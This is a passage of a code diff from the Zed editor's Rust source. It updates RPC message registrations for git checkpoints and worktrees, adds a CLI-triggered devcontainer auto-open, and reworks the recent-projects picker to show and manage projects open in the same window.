Foreground), (TaskContext, Background), (TaskContextForLocation, Background), (Test, Foreground), @@ -278,7 +271,6 @@ messages!( (UpdateChannelMessage, Foreground), (UpdateChannels, Foreground), (UpdateContacts, Foreground), - (UpdateContext, Foreground), (UpdateDiagnosticSummary, Foreground), (UpdateDiffBases, Foreground), (UpdateFollowers, Foreground), @@ -302,6 +294,13 @@ messages!( (GitCommitDetails, Background), (GitFileHistory, Background), (GitFileHistoryResponse, Background), + (GitCreateCheckpoint, Background), + (GitCreateCheckpointResponse, Background), + (GitRestoreCheckpoint, Background), + (GitCompareCheckpoints, Background), + (GitCompareCheckpointsResponse, Background), + (GitDiffCheckpoints, Background), + (GitDiffCheckpointsResponse, Background), (SetIndexText, Background), (Push, Background), (Fetch, Background), @@ -322,8 +321,6 @@ messages!( (CheckForPushedCommitsResponse, Background), (GitDiff, Background), (GitDiffResponse, Background), - (GitDiffStat, Background), - (GitDiffStatResponse, Background), (GitInit, Background), (GetDebugAdapterBinary, Background), (DebugAdapterBinary, Background), @@ -354,8 +351,12 @@ messages!( (NewExternalAgentVersionAvailable, Background), (RemoteStarted, Background), (GitGetWorktrees, Background), + (GitGetHeadSha, Background), + (GitGetHeadShaResponse, Background), (GitWorktreesResponse, Background), (GitCreateWorktree, Background), + (GitRemoveWorktree, Background), + (GitRenameWorktree, Background), (ShareAgentThread, Foreground), (GetSharedAgentThread, Foreground), (GetSharedAgentThreadResponse, Foreground), @@ -496,9 +497,6 @@ request_messages!( (LspQueryResponse, Ack), (RestartLanguageServers, Ack), (StopLanguageServers, Ack), - (OpenContext, OpenContextResponse), - (CreateContext, CreateContextResponse), - (SynchronizeContexts, SynchronizeContextsResponse), (LspExtSwitchSourceHeader, LspExtSwitchSourceHeaderResponse), (LspExtGoToParentModule, LspExtGoToParentModuleResponse), (LspExtCancelFlycheck, Ack), @@ -525,6 +523,10 @@ request_messages!( (RegisterBufferWithLanguageServers, Ack), (GitShow, GitCommitDetails), (GitFileHistory, GitFileHistoryResponse), + (GitCreateCheckpoint, GitCreateCheckpointResponse), + (GitRestoreCheckpoint, Ack), + (GitCompareCheckpoints, GitCompareCheckpointsResponse), + (GitDiffCheckpoints, GitDiffCheckpointsResponse), (GitReset, Ack), (GitDeleteBranch, Ack), (GitCheckoutFiles, Ack), @@ -541,7 +543,6 @@ request_messages!( (GitRenameBranch, Ack), (CheckForPushedCommits, CheckForPushedCommitsResponse), (GitDiff, GitDiffResponse), - (GitDiffStat, GitDiffStatResponse), (GitInit, Ack), (ToggleBreakpoint, Ack), (GetDebugAdapterBinary, DebugAdapterBinary), @@ -559,7 +560,10 @@ request_messages!( (GetContextServerCommand, ContextServerCommand), (RemoteStarted, Ack), (GitGetWorktrees, GitWorktreesResponse), + (GitGetHeadSha, GitGetHeadShaResponse), (GitCreateWorktree, Ack), + (GitRemoveWorktree, Ack), + (GitRenameWorktree, Ack), (TrustWorktrees, Ack), (RestrictWorktrees, Ack), (FindSearchCandidatesChunk, Ack), @@ -683,11 +687,6 @@ entity_messages!( LspExtExpandMacro, LspExtOpenDocs, LspExtRunnables, - AdvertiseContexts, - OpenContext, - CreateContext, - UpdateContext, - SynchronizeContexts, LspExtSwitchSourceHeader, LspExtGoToParentModule, LspExtCancelFlycheck, @@ -711,6 +710,10 @@ entity_messages!( RegisterBufferWithLanguageServers, GitShow, GitFileHistory, + GitCreateCheckpoint, + GitRestoreCheckpoint, + GitCompareCheckpoints, + GitDiffCheckpoints, GitReset, GitDeleteBranch, GitCheckoutFiles, @@ -730,7 +733,6 @@ entity_messages!( GitRemoveRemote, CheckForPushedCommits, GitDiff, - GitDiffStat, GitInit, BreakpointsForFile, ToggleBreakpoint, @@ -750,7 +752,10 @@ entity_messages!( ExternalAgentLoadingStatusUpdated, NewExternalAgentVersionAvailable, GitGetWorktrees, + GitGetHeadSha, GitCreateWorktree, + GitRemoveWorktree, + GitRenameWorktree, TrustWorktrees, RestrictWorktrees, FindSearchCandidatesChunk, @@ -880,6 +885,7 @@ pub fn split_worktree_update(mut message: UpdateWorktree) -> impl Iterator String { } pub fn suggest_on_worktree_updated( + workspace: &mut Workspace, worktree_id: WorktreeId, updated_entries: &UpdatedEntriesSet, project: &gpui::Entity, window: &mut Window, cx: &mut Context, ) { + let cli_auto_open = workspace.open_in_dev_container(); + let devcontainer_updated = updated_entries.iter().any(|(path, _, _)| { path.as_ref() == devcontainer_dir_path() || path.as_ref() == devcontainer_json_path() }); - if !devcontainer_updated { + if !devcontainer_updated && !cli_auto_open { return; } @@ -53,7 +57,35 @@ pub fn suggest_on_worktree_updated( return; } - if find_configs_in_snapshot(worktree).is_empty() { + let has_configs = !find_configs_in_snapshot(worktree).is_empty(); + + if cli_auto_open { + workspace.set_open_in_dev_container(false); + let task = cx.spawn_in(window, async move |workspace, cx| { + let scans_complete = + workspace.update(cx, |workspace, cx| workspace.worktree_scans_complete(cx))?; + scans_complete.await; + + workspace.update_in(cx, |workspace, window, cx| { + let has_configs = workspace + .project() + .read(cx) + .worktrees(cx) + .any(|wt| !find_configs_in_snapshot(wt.read(cx)).is_empty()); + if has_configs { + cx.on_next_frame(window, move |_workspace, window, cx| { + window.dispatch_action(Box::new(zed_actions::OpenDevContainer), cx); + }); + } else { + log::warn!("--dev-container: no devcontainer configuration found in project"); + } + }) + }); + workspace.set_dev_container_task(task); + return; + } + + if !has_configs { return; } @@ -61,7 +93,7 @@ pub fn suggest_on_worktree_updated( let project_path = abs_path.to_string_lossy().to_string(); let key_for_dismiss = project_devcontainer_key(&project_path); - let already_dismissed = KEY_VALUE_STORE + let already_dismissed = KeyValueStore::global(cx) .read_kvp(&key_for_dismiss) .ok() .flatten() @@ -98,9 +130,13 @@ pub fn suggest_on_worktree_updated( .secondary_on_click({ move |_window, cx| { let key = key_for_dismiss.clone(); - db::write_and_log(cx, move || { - KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string()) - }); + let kvp = KeyValueStore::global(cx); + cx.background_spawn(async move { + kvp.write_kvp(key, "dismissed".to_string()) + .await + .log_err(); + }) + .detach(); } }) }) diff --git a/crates/recent_projects/src/disconnected_overlay.rs b/crates/recent_projects/src/disconnected_overlay.rs index 82ff0699054e5614b8078d3223d5e9282e5034b5..e78762eb283160f84b163771b9835188d2ffce4a 100644 --- a/crates/recent_projects/src/disconnected_overlay.rs +++ b/crates/recent_projects/src/disconnected_overlay.rs @@ -2,11 +2,7 @@ use gpui::{ClickEvent, DismissEvent, EventEmitter, FocusHandle, Focusable, Rende use project::project_settings::ProjectSettings; use remote::RemoteConnectionOptions; use settings::Settings; -use ui::{ - Button, ButtonCommon, ButtonStyle, Clickable, Context, ElevationIndex, FluentBuilder, Headline, - HeadlineSize, IconName, IconPosition, InteractiveElement, IntoElement, Label, Modal, - ModalFooter, ModalHeader, ParentElement, Section, Styled, StyledExt, Window, div, h_flex, rems, -}; +use ui::{ElevationIndex, Modal, ModalFooter, ModalHeader, Section, prelude::*}; use workspace::{ ModalView, MultiWorkspace, OpenOptions, Workspace, notifications::DetachAndPromptErr, }; @@ -129,7 +125,7 @@ impl DisconnectedOverlay { paths, app_state, OpenOptions { - replace_window: Some(window_handle), + requesting_window: Some(window_handle), ..Default::default() }, cx, @@ -207,8 +203,7 @@ impl Render for DisconnectedOverlay { Button::new("reconnect", "Reconnect") .style(ButtonStyle::Filled) .layer(ElevationIndex::ModalSurface) - .icon(IconName::ArrowCircle) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::ArrowCircle)) .on_click(cx.listener(Self::handle_reconnect)), ) }), diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index 110a702437d463d6f296510c8f4a3a68d28d7d60..e3bfc0dc08c95c0ce57b818e50965433a6c6bc98 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -2,9 +2,11 @@ mod dev_container_suggest; pub mod disconnected_overlay; mod remote_connections; mod remote_servers; +pub mod sidebar_recent_projects; mod ssh_config; use std::{ + collections::HashSet, path::{Path, PathBuf}, sync::Arc, }; @@ -44,13 +46,16 @@ use ui::{ }; use util::{ResultExt, paths::PathExt}; use workspace::{ - HistoryManager, ModalView, MultiWorkspace, OpenOptions, OpenVisible, PathList, - SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId, + HistoryManager, ModalView, MultiWorkspace, OpenMode, OpenOptions, OpenVisible, PathList, + SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, with_active_or_new_workspace, }; use zed_actions::{OpenDevContainer, OpenRecent, OpenRemote}; -actions!(recent_projects, [ToggleActionsMenu]); +actions!( + recent_projects, + [ToggleActionsMenu, RemoveSelected, AddToWorkspace,] +); #[derive(Clone, Debug)] pub struct RecentProjectEntry { @@ -74,6 +79,7 @@ struct OpenFolderEntry { enum ProjectPickerEntry { Header(SharedString), OpenFolder { index: usize, positions: Vec }, + OpenProject(StringMatch), RecentProject(StringMatch), } @@ -87,8 +93,9 @@ pub async fn get_recent_projects( current_workspace_id: Option, limit: Option, fs: Arc, + db: &WorkspaceDb, ) -> Vec { - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .unwrap_or_default(); @@ -137,8 +144,8 @@ pub async fn get_recent_projects( } } -pub async fn delete_recent_project(workspace_id: WorkspaceId) { - let _ = WORKSPACE_DB.delete_workspace_by_id(workspace_id).await; +pub async fn delete_recent_project(workspace_id: WorkspaceId, db: &WorkspaceDb) { + let _ = db.delete_workspace_by_id(workspace_id).await; } fn get_open_folders(workspace: &Workspace, cx: &App) -> Vec { @@ -198,17 +205,19 @@ fn get_branch_for_worktree( cx: &App, ) -> Option { let worktree_abs_path = worktree.abs_path(); - for repo in repositories { - let repo = repo.read(cx); - if repo.work_directory_abs_path == worktree_abs_path - || worktree_abs_path.starts_with(&*repo.work_directory_abs_path) - { - if let Some(branch) = &repo.branch { - return Some(SharedString::from(branch.name().to_string())); - } - } - } - None + repositories + .iter() + .filter(|repo| { + let repo_path = &repo.read(cx).work_directory_abs_path; + *repo_path == worktree_abs_path || worktree_abs_path.starts_with(repo_path.as_ref()) + }) + .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len()) + .and_then(|repo| { + repo.read(cx) + .branch + .as_ref() + .map(|branch| SharedString::from(branch.name().to_string())) + }) } pub fn init(cx: &mut App) { @@ -256,13 +265,13 @@ pub fn init(cx: &mut App) { user: None, }); - let replace_window = match create_new_window { + let requesting_window = match create_new_window { false => window_handle, true => None, }; let open_options = workspace::OpenOptions { - replace_window, + requesting_window, ..Default::default() }; @@ -315,7 +324,7 @@ pub fn init(cx: &mut App) { let fs = workspace.project().read(cx).fs().clone(); add_wsl_distro(fs, &open_wsl.distro, cx); let open_options = OpenOptions { - replace_window: window.window_handle().downcast::(), + requesting_window: window.window_handle().downcast::(), ..Default::default() }; @@ -337,19 +346,70 @@ pub fn init(cx: &mut App) { cx.on_action(|open_recent: &OpenRecent, cx| { let create_new_window = open_recent.create_new_window; - with_active_or_new_workspace(cx, move |workspace, window, cx| { - let Some(recent_projects) = workspace.active_modal::(cx) else { - let focus_handle = workspace.focus_handle(cx); - RecentProjects::open(workspace, create_new_window, window, focus_handle, cx); - return; - }; - recent_projects.update(cx, |recent_projects, cx| { - recent_projects - .picker - .update(cx, |picker, cx| picker.cycle_selection(window, cx)) - }); - }); + match cx + .active_window() + .and_then(|w| w.downcast::()) + { + Some(multi_workspace) => { + cx.defer(move |cx| { + multi_workspace + .update(cx, |multi_workspace, window, cx| { + let sibling_workspace_ids: HashSet = multi_workspace + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect(); + + let workspace = multi_workspace.workspace().clone(); + workspace.update(cx, |workspace, cx| { + let Some(recent_projects) = + workspace.active_modal::(cx) + else { + let focus_handle = workspace.focus_handle(cx); + RecentProjects::open( + workspace, + create_new_window, + sibling_workspace_ids, + window, + focus_handle, + cx, + ); + return; + }; + + recent_projects.update(cx, |recent_projects, cx| { + recent_projects + .picker + .update(cx, |picker, cx| picker.cycle_selection(window, cx)) + }); + }); + }) + .log_err(); + }); + } + None => { + with_active_or_new_workspace(cx, move |workspace, window, cx| { + let Some(recent_projects) = workspace.active_modal::(cx) else { + let focus_handle = workspace.focus_handle(cx); + RecentProjects::open( + workspace, + create_new_window, + HashSet::new(), + window, + focus_handle, + cx, + ); + return; + }; + + recent_projects.update(cx, |recent_projects, cx| { + recent_projects + .picker + .update(cx, |picker, cx| picker.cycle_selection(window, cx)) + }); + }); + } + } }); cx.on_action(|open_remote: &OpenRemote, cx| { let from_existing_connection = open_remote.from_existing_connection; @@ -414,11 +474,12 @@ pub fn init(cx: &mut App) { cx.subscribe_in( workspace.project(), window, - move |_, project, event, window, cx| { + move |workspace, project, event, window, cx| { if let project::Event::WorktreeUpdatedEntries(worktree_id, updated_entries) = event { dev_container_suggest::suggest_on_worktree_updated( + workspace, *worktree_id, updated_entries, project, @@ -469,7 +530,7 @@ pub fn add_wsl_distro( pub struct RecentProjects { pub picker: Entity>, rem_width: f32, - _subscription: Subscription, + _subscriptions: Vec, } impl ModalView for RecentProjects { @@ -493,6 +554,7 @@ impl RecentProjects { window: &mut Window, cx: &mut Context, ) -> Self { + let style = delegate.style; let picker = cx.new(|cx| { Picker::list(delegate, window, cx) .list_measure_all() @@ -504,16 +566,32 @@ impl RecentProjects { picker.delegate.focus_handle = picker_focus_handle; }); - let _subscription = cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent)); + let mut subscriptions = vec![cx.subscribe(&picker, |_, _, _, cx| cx.emit(DismissEvent))]; + + if style == ProjectPickerStyle::Popover { + let picker_focus = picker.focus_handle(cx); + subscriptions.push( + cx.on_focus_out(&picker_focus, window, |this, _, window, cx| { + let submenu_focused = this.picker.update(cx, |picker, cx| { + picker.delegate.actions_menu_handle.is_focused(window, cx) + }); + if !submenu_focused { + cx.emit(DismissEvent); + } + }), + ); + } // We do not want to block the UI on a potentially lengthy call to DB, so we're gonna swap // out workspace locations once the future runs to completion. + let db = WorkspaceDb::global(cx); cx.spawn_in(window, async move |this, cx| { let Some(fs) = fs else { return }; - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .log_err() .unwrap_or_default(); + let workspaces = workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.set_workspaces(workspaces); @@ -526,13 +604,14 @@ impl RecentProjects { Self { picker, rem_width, - _subscription, + _subscriptions: subscriptions, } } pub fn open( workspace: &mut Workspace, create_new_window: bool, + sibling_workspace_ids: HashSet, window: &mut Window, focus_handle: FocusHandle, cx: &mut Context, @@ -541,12 +620,14 @@ impl RecentProjects { let open_folders = get_open_folders(workspace, cx); let project_connection_options = workspace.project().read(cx).remote_connection_options(cx); let fs = Some(workspace.app_state().fs.clone()); + workspace.toggle_modal(window, cx, |window, cx| { let delegate = RecentProjectsDelegate::new( weak, create_new_window, focus_handle, open_folders, + sibling_workspace_ids, project_connection_options, ProjectPickerStyle::Modal, ); @@ -557,6 +638,7 @@ impl RecentProjects { pub fn popover( workspace: WeakEntity, + sibling_workspace_ids: HashSet, create_new_window: bool, focus_handle: FocusHandle, window: &mut Window, @@ -580,6 +662,7 @@ impl RecentProjects { create_new_window, focus_handle, open_folders, + sibling_workspace_ids, project_connection_options, ProjectPickerStyle::Popover, ); @@ -604,6 +687,79 @@ impl RecentProjects { } }); } + + fn handle_remove_selected( + &mut self, + _: &RemoveSelected, + window: &mut Window, + cx: &mut Context, + ) { + self.picker.update(cx, |picker, cx| { + let ix = picker.delegate.selected_index; + + match picker.delegate.filtered_entries.get(ix) { + Some(ProjectPickerEntry::OpenFolder { index, .. }) => { + if let Some(folder) = picker.delegate.open_folders.get(*index) { + let worktree_id = folder.worktree_id; + let Some(workspace) = picker.delegate.workspace.upgrade() else { + return; + }; + workspace.update(cx, |workspace, cx| { + let project = workspace.project().clone(); + project.update(cx, |project, cx| { + project.remove_worktree(worktree_id, cx); + }); + }); + picker.delegate.open_folders = get_open_folders(workspace.read(cx), cx); + let query = picker.query(cx); + picker.update_matches(query, window, cx); + } + } + Some(ProjectPickerEntry::OpenProject(hit)) => { + if let Some((workspace_id, ..)) = + picker.delegate.workspaces.get(hit.candidate_id) + { + let workspace_id = *workspace_id; + picker + .delegate + .remove_sibling_workspace(workspace_id, window, cx); + let query = picker.query(cx); + picker.update_matches(query, window, cx); + } + } + Some(ProjectPickerEntry::RecentProject(_)) => { + picker.delegate.delete_recent_project(ix, window, cx); + } + _ => {} + } + }); + } + + fn handle_add_to_workspace( + &mut self, + _: &AddToWorkspace, + window: &mut Window, + cx: &mut Context, + ) { + self.picker.update(cx, |picker, cx| { + let ix = picker.delegate.selected_index; + + if let Some(ProjectPickerEntry::RecentProject(hit)) = + picker.delegate.filtered_entries.get(ix) + { + if let Some((_, location, paths, _)) = + picker.delegate.workspaces.get(hit.candidate_id) + { + if matches!(location, SerializedWorkspaceLocation::Local) { + let paths_to_add = paths.paths().to_vec(); + picker + .delegate + .add_project_to_workspace(paths_to_add, window, cx); + } + } + } + }); + } } impl EventEmitter for RecentProjects {} @@ -619,6 +775,8 @@ impl Render for RecentProjects { v_flex() .key_context("RecentProjects") .on_action(cx.listener(Self::handle_toggle_open_menu)) + .on_action(cx.listener(Self::handle_remove_selected)) + .on_action(cx.listener(Self::handle_add_to_workspace)) .w(rems(self.rem_width)) .child(self.picker.clone()) } @@ -627,6 +785,7 @@ impl Render for RecentProjects { pub struct RecentProjectsDelegate { workspace: WeakEntity, open_folders: Vec, + sibling_workspace_ids: HashSet, workspaces: Vec<( WorkspaceId, SerializedWorkspaceLocation, @@ -652,6 +811,7 @@ impl RecentProjectsDelegate { create_new_window: bool, focus_handle: FocusHandle, open_folders: Vec, + sibling_workspace_ids: HashSet, project_connection_options: Option, style: ProjectPickerStyle, ) -> Self { @@ -659,6 +819,7 @@ impl RecentProjectsDelegate { Self { workspace, open_folders, + sibling_workspace_ids, workspaces: Vec::new(), filtered_entries: Vec::new(), selected_index: 0, @@ -705,32 +866,14 @@ impl PickerDelegate for RecentProjectsDelegate { window: &mut Window, cx: &mut Context>, ) -> Div { - let focus_handle = self.focus_handle.clone(); - h_flex() .flex_none() .h_9() - .pl_2p5() - .pr_1p5() + .px_2p5() .justify_between() .border_b_1() .border_color(cx.theme().colors().border_variant) .child(editor.render(window, cx)) - .child( - IconButton::new("add_folder", IconName::Plus) - .icon_size(IconSize::Small) - .tooltip(move |_, cx| { - Tooltip::for_action_in( - "Add Project to Workspace", - &workspace::AddFolderToProject, - &focus_handle, - cx, - ) - }) - .on_click(|_, window, cx| { - window.dispatch_action(workspace::AddFolderToProject.boxed_clone(), cx) - }), - ) } fn match_count(&self) -> usize { @@ -750,15 +893,14 @@ impl PickerDelegate for RecentProjectsDelegate { self.selected_index = ix; } - fn can_select( - &mut self, - ix: usize, - _window: &mut Window, - _cx: &mut Context>, - ) -> bool { + fn can_select(&self, ix: usize, _window: &mut Window, _cx: &mut Context>) -> bool { matches!( self.filtered_entries.get(ix), - Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::RecentProject(_)) + Some( + ProjectPickerEntry::OpenFolder { .. } + | ProjectPickerEntry::OpenProject(_) + | ProjectPickerEntry::RecentProject(_) + ) ) } @@ -793,6 +935,38 @@ impl PickerDelegate for RecentProjectsDelegate { )) }; + let sibling_candidates: Vec<_> = self + .workspaces + .iter() + .enumerate() + .filter(|(_, (id, _, _, _))| self.is_sibling_workspace(*id, cx)) + .map(|(id, (_, _, paths, _))| { + let combined_string = paths + .ordered_paths() + .map(|path| path.compact().to_string_lossy().into_owned()) + .collect::>() + .join(""); + StringMatchCandidate::new(id, &combined_string) + }) + .collect(); + + let mut sibling_matches = smol::block_on(fuzzy::match_strings( + &sibling_candidates, + query, + smart_case, + true, + 100, + &Default::default(), + cx.background_executor().clone(), + )); + sibling_matches.sort_unstable_by(|a, b| { + b.score + .partial_cmp(&a.score) + .unwrap_or(std::cmp::Ordering::Equal) + .then_with(|| a.candidate_id.cmp(&b.candidate_id)) + }); + + // Build candidates for recent projects (not current, not sibling, not open folder) let recent_candidates: Vec<_> = self .workspaces .iter() @@ -843,6 +1017,33 @@ impl PickerDelegate for RecentProjectsDelegate { } } + let has_siblings_to_show = if is_empty_query { + !sibling_candidates.is_empty() + } else { + !sibling_matches.is_empty() + }; + + if has_siblings_to_show { + entries.push(ProjectPickerEntry::Header("This Window".into())); + + if is_empty_query { + for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() { + if self.is_sibling_workspace(*workspace_id, cx) { + entries.push(ProjectPickerEntry::OpenProject(StringMatch { + candidate_id: id, + score: 0.0, + positions: Vec::new(), + string: String::new(), + })); + } + } + } else { + for m in sibling_matches { + entries.push(ProjectPickerEntry::OpenProject(m)); + } + } + } + let has_recent_to_show = if is_empty_query { !recent_candidates.is_empty() } else { @@ -897,6 +1098,31 @@ impl PickerDelegate for RecentProjectsDelegate { } cx.emit(DismissEvent); } + Some(ProjectPickerEntry::OpenProject(selected_match)) => { + let Some((workspace_id, _, _, _)) = + self.workspaces.get(selected_match.candidate_id) + else { + return; + }; + let workspace_id = *workspace_id; + + if let Some(handle) = window.window_handle().downcast::() { + cx.defer(move |cx| { + handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace + .workspaces() + .find(|ws| ws.read(cx).database_id() == Some(workspace_id)) + .cloned(); + if let Some(workspace) = workspace { + multi_workspace.activate(workspace, window, cx); + } + }) + .log_err(); + }); + } + cx.emit(DismissEvent); + } Some(ProjectPickerEntry::RecentProject(selected_match)) => { let Some(workspace) = self.workspace.upgrade() else { return; @@ -930,7 +1156,12 @@ impl PickerDelegate for RecentProjectsDelegate { cx.defer(move |cx| { if let Some(task) = handle .update(cx, |multi_workspace, window, cx| { - multi_workspace.open_project(paths, window, cx) + multi_workspace.open_project( + paths, + OpenMode::Activate, + window, + cx, + ) }) .log_err() { @@ -940,7 +1171,19 @@ impl PickerDelegate for RecentProjectsDelegate { } return; } else { - workspace.open_workspace_for_paths(false, paths, window, cx) + workspace + .open_workspace_for_paths( + OpenMode::NewWindow, + paths, + window, + cx, + ) + .detach_and_prompt_err( + "Failed to open project", + window, + cx, + |_, _, _| None, + ); } } SerializedWorkspaceLocation::Remote(mut connection) => { @@ -951,7 +1194,7 @@ impl PickerDelegate for RecentProjectsDelegate { None }; let open_options = OpenOptions { - replace_window, + requesting_window: replace_window, ..Default::default() }; if let RemoteConnectionOptions::Ssh(connection) = &mut connection { @@ -969,14 +1212,14 @@ impl PickerDelegate for RecentProjectsDelegate { ) .await }) + .detach_and_prompt_err( + "Failed to open project", + window, + cx, + |_, _, _| None, + ); } } - .detach_and_prompt_err( - "Failed to open project", - window, - cx, - |_, _, _| None, - ); }); cx.emit(DismissEvent); } @@ -1098,27 +1341,124 @@ impl PickerDelegate for RecentProjectsDelegate { this.tooltip(Tooltip::text(path.to_string_lossy().to_string())) }), ) - .map(|el| { - if self.selected_index == ix { - el.end_slot(secondary_actions) - } else { - el.end_hover_slot(secondary_actions) - } - }) + .end_slot(secondary_actions) + .show_end_slot_on_hover() + .into_any_element(), + ) + } + ProjectPickerEntry::OpenProject(hit) => { + let (workspace_id, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace_id = *workspace_id; + let ordered_paths: Vec<_> = paths + .ordered_paths() + .map(|p| p.compact().to_string_lossy().to_string()) + .collect(); + let tooltip_path: SharedString = match &location { + SerializedWorkspaceLocation::Remote(options) => { + let host = options.display_name(); + if ordered_paths.len() == 1 { + format!("{} ({})", ordered_paths[0], host).into() + } else { + format!("{}\n({})", ordered_paths.join("\n"), host).into() + } + } + _ => ordered_paths.join("\n").into(), + }; + + let mut path_start_offset = 0; + let (match_labels, paths): (Vec<_>, Vec<_>) = paths + .ordered_paths() + .map(|p| p.compact()) + .map(|path| { + let highlighted_text = + highlights_for_path(path.as_ref(), &hit.positions, path_start_offset); + path_start_offset += highlighted_text.1.text.len(); + highlighted_text + }) + .unzip(); + + let prefix = match &location { + SerializedWorkspaceLocation::Remote(options) => { + Some(SharedString::from(options.display_name())) + } + _ => None, + }; + + let highlighted_match = HighlightedMatchWithPaths { + prefix, + match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "), + paths, + }; + + let icon = icon_for_remote_connection(match location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(options) => Some(options), + }); + + let secondary_actions = h_flex() + .gap_1() + .child( + IconButton::new("remove_open_project", IconName::Close) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Remove Project from Window")) + .on_click(cx.listener(move |picker, _, window, cx| { + cx.stop_propagation(); + window.prevent_default(); + picker + .delegate + .remove_sibling_workspace(workspace_id, window, cx); + let query = picker.query(cx); + picker.update_matches(query, window, cx); + })), + ) + .into_any_element(); + + Some( + ListItem::new(ix) + .toggle_state(selected) + .inset(true) + .spacing(ListItemSpacing::Sparse) + .child( + h_flex() + .id("open_project_info_container") + .gap_3() + .flex_grow() + .when(self.has_any_non_local_projects, |this| { + this.child(Icon::new(icon).color(Color::Muted)) + }) + .child({ + let mut highlighted = highlighted_match; + if !self.render_paths { + highlighted.paths.clear(); + } + highlighted.render(window, cx) + }) + .tooltip(Tooltip::text(tooltip_path)), + ) + .end_slot(secondary_actions) + .show_end_slot_on_hover() .into_any_element(), ) } ProjectPickerEntry::RecentProject(hit) => { - let popover_style = matches!(self.style, ProjectPickerStyle::Popover); let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; let is_local = matches!(location, SerializedWorkspaceLocation::Local); let paths_to_add = paths.paths().to_vec(); - let tooltip_path: SharedString = paths + let ordered_paths: Vec<_> = paths .ordered_paths() .map(|p| p.compact().to_string_lossy().to_string()) - .collect::>() - .join("\n") - .into(); + .collect(); + let tooltip_path: SharedString = match &location { + SerializedWorkspaceLocation::Remote(options) => { + let host = options.display_name(); + if ordered_paths.len() == 1 { + format!("{} ({})", ordered_paths[0], host).into() + } else { + format!("{}\n({})", ordered_paths.join("\n"), host).into() + } + } + _ => ordered_paths.join("\n").into(), + }; let mut path_start_offset = 0; let (match_labels, paths): (Vec<_>, Vec<_>) = paths @@ -1151,9 +1491,9 @@ impl PickerDelegate for RecentProjectsDelegate { .gap_px() .when(is_local, |this| { this.child( - IconButton::new("add_to_workspace", IconName::Plus) + IconButton::new("add_to_workspace", IconName::FolderPlus) .icon_size(IconSize::Small) - .tooltip(Tooltip::text("Add Project to Workspace")) + .tooltip(Tooltip::text("Add Project to this Workspace")) .on_click({ let paths_to_add = paths_to_add.clone(); cx.listener(move |picker, _event, window, cx| { @@ -1168,28 +1508,26 @@ impl PickerDelegate for RecentProjectsDelegate { }), ) }) - .when(popover_style, |this| { - this.child( - IconButton::new("open_new_window", IconName::ArrowUpRight) - .icon_size(IconSize::XSmall) - .tooltip({ - move |_, cx| { - Tooltip::for_action_in( - "Open Project in New Window", - &menu::SecondaryConfirm, - &focus_handle, - cx, - ) - } - }) - .on_click(cx.listener(move |this, _event, window, cx| { - cx.stop_propagation(); - window.prevent_default(); - this.delegate.set_selected_index(ix, window, cx); - this.delegate.confirm(true, window, cx); - })), - ) - }) + .child( + IconButton::new("open_new_window", IconName::ArrowUpRight) + .icon_size(IconSize::XSmall) + .tooltip({ + move |_, cx| { + Tooltip::for_action_in( + "Open Project in New Window", + &menu::SecondaryConfirm, + &focus_handle, + cx, + ) + } + }) + .on_click(cx.listener(move |this, _event, window, cx| { + cx.stop_propagation(); + window.prevent_default(); + this.delegate.set_selected_index(ix, window, cx); + this.delegate.confirm(true, window, cx); + })), + ) .child( IconButton::new("delete", IconName::Close) .icon_size(IconSize::Small) @@ -1229,13 +1567,8 @@ impl PickerDelegate for RecentProjectsDelegate { }) .tooltip(Tooltip::text(tooltip_path)), ) - .map(|el| { - if self.selected_index == ix { - el.end_slot(secondary_actions) - } else { - el.end_hover_slot(secondary_actions) - } - }) + .end_slot(secondary_actions) + .show_end_slot_on_hover() .into_any_element(), ) } @@ -1245,9 +1578,9 @@ impl PickerDelegate for RecentProjectsDelegate { fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { let focus_handle = self.focus_handle.clone(); let popover_style = matches!(self.style, ProjectPickerStyle::Popover); - let open_folder_section = matches!( - self.filtered_entries.get(self.selected_index)?, - ProjectPickerEntry::OpenFolder { .. } + let is_already_open_entry = matches!( + self.filtered_entries.get(self.selected_index), + Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::OpenProject(_)) ); if popover_style { @@ -1258,17 +1591,14 @@ impl PickerDelegate for RecentProjectsDelegate { .gap_1() .border_t_1() .border_color(cx.theme().colors().border_variant) - .child( + .child({ + let open_action = workspace::Open::default(); Button::new("open_local_folder", "Open Local Project") - .key_binding(KeyBinding::for_action_in( - &workspace::Open, - &focus_handle, - cx, - )) - .on_click(|_, window, cx| { - window.dispatch_action(workspace::Open.boxed_clone(), cx) - }), - ) + .key_binding(KeyBinding::for_action_in(&open_action, &focus_handle, cx)) + .on_click(move |_, window, cx| { + window.dispatch_action(open_action.boxed_clone(), cx) + }) + }) .child( Button::new("open_remote_folder", "Open Remote Project") .key_binding(KeyBinding::for_action( @@ -1293,6 +1623,44 @@ impl PickerDelegate for RecentProjectsDelegate { ); } + let selected_entry = self.filtered_entries.get(self.selected_index); + + let secondary_footer_actions: Option = match selected_entry { + Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::OpenProject(_)) => { + let label = if matches!(selected_entry, 